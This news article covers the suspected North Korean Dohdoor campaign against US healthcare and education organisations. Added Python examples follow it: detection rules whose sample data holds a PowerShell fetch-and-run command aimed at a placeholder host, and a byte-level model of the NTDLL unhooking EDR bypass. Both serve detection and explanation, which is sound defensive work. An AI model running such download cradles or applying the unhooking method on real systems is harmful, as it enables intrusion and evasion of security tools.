Suspected Nork digital intruders caught breaking into US healthcare, education orgs

A suspected North Korean threat actor (UAT-10027) is conducting an ongoing campaign against US healthcare and education sectors using a novel backdoor called "Dohdoor." Initial access is gained via phishing, leading to a multi-stage infection that uses DLL sideloading, DNS-over-HTTPS for C2 communication, and EDR bypass techniques like NTDLL unhooking to deploy a Cobalt Strike Beacon payload.

Cyber-crime

Suspected Nork digital intruders caught breaking into US healthcare, education orgs

Who is knocking at the Dohdoor?

Jessica Lyons Fri 27 Feb 2026 // 19:59 UTC

Digital intruders with possible links to North Korea have been infecting US education and healthcare sectors with a never-before-seen backdoor since at least December, according to security researchers.

"We observed that the attacker had infected several educational institutions, including a university that is connected to several other institutions, indicating a potential wider attack surface," Cisco Talos researcher Chetan Raghuprasad told The Register. "Additionally, one of the affected entities was a healthcare facility, specifically for elderly care.

"Based on the nature of the victimology in the current intrusions, the actor likely has a motive for financial gain," Raghuprasad added.

Talos spotted the ongoing campaign, attributed to a group it tracks as UAT-10027, and says "with low confidence" that it's a North Korean crew, based on similarities to Lazarus Group and other Pyongyang-backed gangs.

The attackers likely gain initial access via social engineering and phishing, we're told, and the multi-stage infection ultimately delivers a new backdoor, Dohdoor, which shares technical characteristics with Lazarus Group's Lazarloader malware.

After gaining access, potentially through a phishing email, the intruders execute a PowerShell downloader that fetches a Windows batch script dropper from a remote staging server and runs it. The batch script then orchestrates a dynamic-link library (DLL) sideloading technique: a legitimate executable is made to load a malicious DLL dropped into its search path under the name "propsys.dll" or "batmeter.dll", both names of genuine Windows system libraries.

Brand new Dohdoor

The DLL, which Talos calls "Dohdoor," operates as a loader: it downloads, decrypts, and executes malicious payloads within legitimate Windows processes.
This gives the intruders backdoor access to the victim's environment, which they use to download the next payload, a Cobalt Strike Beacon, straight into the machine's memory.

UAT-10027 uses several stealthy techniques to avoid detection, including fronting its command-and-control (C2) domains with Cloudflare infrastructure and resolving the C2 server's IP address with DNS-over-HTTPS (DoH). Because the lookup itself travels as an HTTPS request to a trusted resolver rather than as a plaintext DNS query, DNS security tools never see the C2 domain being resolved, and all outbound traffic from compromised machines looks like legitimate HTTPS traffic to a trusted IP address.

Dohdoor also uses process hollowing to inject the payload into a legitimate Windows binary, so the malware runs under the name of a trusted process rather than as a suspicious image of its own.

Additionally, Talos observed the new backdoor using an endpoint detection and response (EDR) bypass technique against endpoint security tools that monitor Windows API calls. Such tools typically work by placing user-mode hooks on the system call stubs in ntdll.dll; the backdoor defeats them by identifying the hooked stubs and restoring their original bytes, unhooking the system calls.

"The NTDLL unhooking technique used to bypass EDR monitoring by identifying and restoring system call stubs aligns with features found in earlier Lazarloader variants," Talos researchers Alex Karkins and Chetan Raghuprasad said in a Thursday report.

They also noted that DNS-over-HTTPS via Cloudflare's DNS service, process hollowing, and sideloading malicious DLLs under the disguised file name "propsys.dll" have all been used in earlier Lazarus campaigns.
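The chain described above (PowerShell downloader, batch dropper, sideloaded propsys.dll/batmeter.dll, DoH lookup from the implant) maps onto telemetry most shops already collect. The following is an added example, not Cisco Talos' or The Register's code: it runs a handful of detection rules over constructed Sysmon-style events (EventID 1 process creation, 7 image load, 3 network connection) and escalates a host that trips more than one rule. All hosts, paths, URLs and the `host.exe` stand-in for the abused legitimate executable are fabricated; the article does not name the host binary or the staging server.

```python
"""Detection rules for the UAT-10027 infection chain described above.

Added example: this is not Cisco Talos' or The Register's code.  It runs
over constructed Sysmon-style events (EventID 1 process creation, 7 image
load, 3 network connection) whose field names follow Sysmon's schema.  Every
event, host name, path and URL below is fabricated for illustration.
"""
import re
from collections import defaultdict

# DLL names under which the article says Dohdoor is sideloaded.
SIDELOAD_NAMES = {"propsys.dll", "batmeter.dll"}
# Where a legitimately loaded copy of those DLLs should live.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Cloudflare's public DoH endpoint and the addresses it answers on.
DOH_HOSTS = {"cloudflare-dns.com", "one.one.one.one", "1.1.1.1", "1.0.0.1"}
# Assumption: browsers are the only processes expected to talk DoH directly.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# PowerShell download-cradle fragments commonly seen in stage-0 scripts.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
PS_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path):
    """'C:\\Users\\bob\\x.dll' -> 'x.dll' (lower-cased)."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return a list of (rule, detail) hits for one event; [] if clean."""
    hits = []
    eid, image = ev["EventID"], basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    if eid == 1 and image in PS_IMAGES and CRADLE.search(cmd):
        hits.append(("ps_download_cradle", cmd))
    if (eid == 1 and image == "cmd.exe" and re.search(r"\.bat\b", cmd, re.I)
            and basename(ev.get("ParentImage", "")) in PS_IMAGES):
        hits.append(("bat_dropper_from_powershell", cmd))
    if eid == 7:
        loaded = ev["ImageLoaded"]
        if basename(loaded) in SIDELOAD_NAMES and not loaded.lower().startswith(TRUSTED_DIRS):
            hits.append(("dll_sideload", f"{image} loaded {loaded}"))
    if eid == 3:
        dests = {ev.get("DestinationIp", ""), ev.get("DestinationHostname", "").lower()}
        if ev["DestinationPort"] == 443 and dests & DOH_HOSTS and image not in BROWSERS:
            dest = ev.get("DestinationHostname") or ev.get("DestinationIp")
            hits.append(("doh_from_non_browser", f"{image} -> {dest}:443"))
    return hits


def triage(events):
    """Group hits per host; a host tripping two or more distinct rules is escalated."""
    per_host = defaultdict(dict)
    for ev in events:
        for rule, detail in check_event(ev):
            per_host[ev["Computer"]].setdefault(rule, detail)
    return {h: {"rules": sorted(r), "escalate": len(r) >= 2} for h, r in per_host.items()}


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample telemetry.  WS1 shows the whole chain; WS2 shows benign
# look-alikes (the real propsys.dll from System32, a browser doing DoH).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS1", "Image": PS,
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://staging.example/u.ps1')"},
    {"EventID": 1, "Computer": "WS1", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": PS, "CommandLine": "cmd.exe /c C:\\Users\\Public\\u.bat"},
    {"EventID": 7, "Computer": "WS1", "Image": "C:\\Users\\Public\\host.exe",  # host.exe: placeholder name
     "ImageLoaded": "C:\\Users\\Public\\propsys.dll"},
    {"EventID": 3, "Computer": "WS1", "Image": "C:\\Users\\Public\\host.exe",
     "DestinationHostname": "cloudflare-dns.com", "DestinationIp": "1.1.1.1", "DestinationPort": 443},
    {"EventID": 7, "Computer": "WS2", "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Windows\\System32\\propsys.dll"},
    {"EventID": 3, "Computer": "WS2", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationHostname": "cloudflare-dns.com", "DestinationIp": "1.1.1.1", "DestinationPort": 443},
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```

The individual rules are noisy on their own (plenty of admins run PowerShell cradles, and some non-browser software does speak DoH), which is why `triage` only escalates a host that shows two or more stages of the chain. Note that Sysmon's DNS event (EventID 22) sees nothing here, because the implant's resolution never touches the Windows DNS client; the network-connection event to the resolver's port 443 is the only host-side trace of the lookup.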
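To make the "identifying and restoring system call stubs" step concrete, here is an added model of NTDLL unhooking. It is not Dohdoor's or Talos' code: it operates on constructed byte strings that imitate x64 ntdll syscall stubs, so it runs on any platform. On a real Windows host the clean bytes would be read from ntdll.dll on disk (or the \KnownDlls section) and the hooked bytes from the image mapped into the process; the export names are real ntdll exports, but the syscall numbers (SSNs) and the trampoline offset are illustrative, since SSNs change between Windows builds. The last function shows the defender's side of the same comparison: an EDR verifying that its hooks are still present.

```python
"""Model of NTDLL unhooking, the EDR bypass the article attributes to Dohdoor.

Added example, not Dohdoor's or Talos' code.  Works on constructed byte
strings imitating x64 ntdll syscall stubs.  Export names are real ntdll
exports; the SSNs and the trampoline offset are illustrative.
"""
import struct

STUB_SIZE = 32  # ntdll pads each Nt* stub to a 32-byte slot with int3 (0xCC)
PROLOGUE = b"\x4c\x8b\xd1\xb8"  # mov r10, rcx ; mov eax, <imm32 SSN>


def syscall_stub(ssn):
    """Canonical x64 stub: mov r10,rcx; mov eax,SSN; test the
    KUSER_SHARED_DATA SystemCall flag; syscall; ret (int 2e fallback)."""
    body = (PROLOGUE + struct.pack("<I", ssn)
            + b"\xf6\x04\x25\x08\x03\xfe\x7f\x01"  # test byte ptr [7ffe0308h], 1
            + b"\x75\x03"                          # jne +3
            + b"\x0f\x05"                          # syscall
            + b"\xc3"                              # ret
            + b"\xcd\x2e"                          # int 2eh
            + b"\xc3")                             # ret
    return body.ljust(STUB_SIZE, b"\xcc")


def build_text(exports):
    """Lay stubs out back to back; returns (bytes, {name: offset})."""
    blob, offsets = bytearray(), {}
    for name, ssn in exports.items():
        offsets[name] = len(blob)
        blob += syscall_stub(ssn)
    return bytes(blob), offsets


def install_hook(text, offset, trampoline):
    """What a user-mode EDR does: overwrite the stub's first 5 bytes with
    'jmp rel32' to its trampoline.  Addresses here are blob offsets."""
    t = bytearray(text)
    rel = (trampoline - (offset + 5)) & 0xFFFFFFFF
    t[offset:offset + 5] = b"\xe9" + struct.pack("<I", rel)
    return bytes(t)


def hooked_stubs(text, offsets):
    """Unhooking step 1: find stubs whose prologue is no longer canonical."""
    return sorted(n for n, o in offsets.items() if text[o:o + 4] != PROLOGUE)


def unhook(text, clean, offsets):
    """Unhooking step 2: copy each hooked stub back from the clean image."""
    t = bytearray(text)
    for name in hooked_stubs(text, offsets):
        o = offsets[name]
        t[o:o + STUB_SIZE] = clean[o:o + STUB_SIZE]
    return bytes(t)


def ssn_of(text, offset):
    """Read the syscall number out of a (clean) stub."""
    return struct.unpack_from("<I", text, offset + 4)[0]


def removed_hooks(text, offsets, expected_hooked):
    """Defender side: the EDR re-checks its hooks; a stub that no longer
    starts with 0xE9 (jmp) has been unhooked behind its back."""
    return [n for n in expected_hooked if text[offsets[n]] != 0xE9]


# Illustrative SSNs; real values depend on the Windows build.
EXPORTS = {"NtAllocateVirtualMemory": 0x18, "NtProtectVirtualMemory": 0x50, "NtWriteVirtualMemory": 0x3A}
CLEAN, OFFSETS = build_text(EXPORTS)
HOOKED = install_hook(CLEAN, OFFSETS["NtProtectVirtualMemory"], 0x1000)  # 0x1000: made-up trampoline
RESTORED = unhook(HOOKED, CLEAN, OFFSETS)

if __name__ == "__main__":
    print("hooked before:", hooked_stubs(HOOKED, OFFSETS))
    print("hooked after unhook:", hooked_stubs(RESTORED, OFFSETS))
    print("EDR sees removed:", removed_hooks(RESTORED, OFFSETS, ["NtProtectVirtualMemory"]))
```

The practical lesson for detection is the last function: a user-mode hook is only as good as the EDR's willingness to re-verify it, and a process whose ntdll `.text` suddenly matches the on-disk copy again after the agent hooked it is itself a high-confidence signal. Kernel-side telemetry (ETW-TI, callbacks) does not depend on these stubs and is unaffected by this technique.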
"While UAT-10027's malware shares technical overlaps with the Lazarus Group, the campaign's focus on the education and health care sectors deviates from Lazarus' typical profile of cryptocurrency and defense targeting," the duo said.

That assertion may be slightly out of date: Symantec and Carbon Black threat hunters earlier this week warned that Lazarus has begun using Medusa ransomware in extortion attacks targeting at least one US healthcare organization.

One of Lazarus' most prolific subgroups, Andariel, which acts as the cyber-arm of North Korea's military intelligence agency, has previously used Maui and Play ransomware in its intrusions, including those targeting the healthcare sector. Additionally, Kimsuky, another one of Pyongyang's intelligence-gathering goon squads, has hit the education sector in its campaigns. ®
